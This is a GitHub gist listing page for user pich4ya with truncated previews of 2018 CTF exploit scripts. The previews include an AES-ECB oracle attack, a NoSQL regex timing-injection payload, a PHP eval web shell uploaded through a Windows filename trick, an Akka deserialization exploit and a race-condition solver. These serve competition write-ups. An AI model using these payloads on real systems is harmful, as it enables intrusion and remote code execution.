Skip to content

Instantly share code, notes, and snippets.

View pich4ya's full-sized avatar

LongCat pich4ya

116 followers · 1 following
View GitHub Profile
@pich4ya
pich4ya / enter_the_dungeon1.py
Last active April 2, 2018 12:42
SwampCTF 2018 - Locked Dungeon
#!/usr/bin/env python
# SwampCTF 2018 - Locked Dungeon
# https://play.swampctf.com/
import argparse
from hashlib import sha256
from Crypto.Cipher import AES
import os
import sys
@pich4ya
pich4ya / loginme.js
Created April 1, 2018 18:07
var express = require('express')
var app = express()
var bodyParser = require('body-parser')
app.use(bodyParser.urlencoded({}));
var path = require("path");
var moment = require('moment');
var MongoClient = require('mongodb').MongoClient;
var url = "mongodb://localhost:27017/";
@pich4ya
pich4ya / ecb_padding_exploit.py
Created April 2, 2018 12:39
SwampCTF 2018 - Locked Dungeon Writeup
from pwn import *
import string
s = remote('chal1.swampctf.com', 1450)
flag=''
for j in xrange(1,60):
s.send('a'*(47-len(flag))+'\n')
checker = s.recvline().strip()
@pich4ya
pich4ya / loginme_exploit.py
Last active April 3, 2018 16:34
Tencent CTF LoginMe Exploit
# @author LongCat & Bongtrop
import string
import requests
import urllib
# username=admin&password=y&|hex_md5(.)(.)y.(.)....this.password_(\w%2b)|=$2%3d%3d$2$2+%26%26+this.password_$4[0]%3d%3d%3d'1+%26%26+sleex$1100$3+%26%26+$2$2%3d%3d$2
flag=''
for char_counter in xrange(0,100):
for characters in string.letters+string.digits+"{}":
@pich4ya
pich4ya / LockedDungeons2.py
Created April 5, 2018 15:30
swamp CTF 2018 - Locked Dungeons-2 (Crypto)
#!/usr/bin/env python2.7
from hashlib import sha256, md5
from Crypto.Cipher import AES
import os
import random
from binascii import hexlify, unhexlify
from base64 import b64decode, b64encode
import sys
@pich4ya
pich4ya / index.html
Created April 6, 2018 10:06
loginme
<title>Login</title>
<style>
/*@import url(https://fonts.googleapis.com/css?family=Cutive+Mono);*/
body {
background: #456;
font-family: 'Consolas', sans-serif;
}
@pich4ya
pich4ya / hitbxctf2018_upload.py
Created April 14, 2018 07:49
HITB-XCTF 2018 - Upload (Web) Writeup
# @author LongCat (Pichaya Morimoto)
import requests, string
# On Windows OS move_uploaded_file function will convert "foo.php"
# followed by one or more of the chars \x2E (.), \x2F (/), \x5C (\) back to "foo.php".
# http://www.ush.it/2009/07/26/php-filesystem-attack-vectors-take-two/
files = {'file': ('pwn.php ','<?php if(isset($_POST[0])){ eval($_POST[0]); }else{ phpinfo(); } ?>')}
values = {'submit': 'upload'}
phpshell = requests.post('http://47.90.97.18:9999/upload.php', files=files, data=values).text.strip(u'\ufeff').strip()
print phpshell
@pich4ya
pich4ya / app.py
Created April 15, 2018 18:26
HITB XCTF 2018 - Python's revenge (Web)
# Python's revenge
# This is a easy python sandbox, can you bypass it and get the flag?
# https://hitbxctf2018.xctf.org.cn/contest_challenge/
from __future__ import unicode_literals
from flask import Flask, request, make_response, redirect, url_for, session
from flask import render_template, flash, redirect, url_for, request
from werkzeug.security import safe_str_cmp
from base64 import b64decode as b64d
from base64 import b64encode as b64e
from hashlib import sha256
@pich4ya
pich4ya / AkkaExploit.java
Created April 25, 2018 08:55
For Debug with https://doc.akka.io/docs/akka/2.4/security/2017-02-10-java-serialization.html
/*
akka-actor_2.10-2.3.16.jar
akka-remote_2.10-2.3.16.jar
scala-library_2.10.0.jar
config-1.3.0.jar
protobuf-java-2.6.1.jar
netty-3.10.6.Final.jar
*/
package akkaexploit;
@pich4ya
pich4ya / 0ps_CTF2018_easy_user_mgt.py
Created May 5, 2018 22:29
0ps CTF ‘easy user manage system’ task – web (Race Condition bug)
# -- 0ps CTF ‘easy user manage system’ task – web (Race Condition bug)
# https://whit3hat.com/2018/04/05/0ps-ctf-easy-management-web/
# https://whit3hat.com/wp-content/uploads/2018/04/solve.py
from flask import Flask, request
import time
import socket
from os import urandom, remove
import requests
import urllib
import threading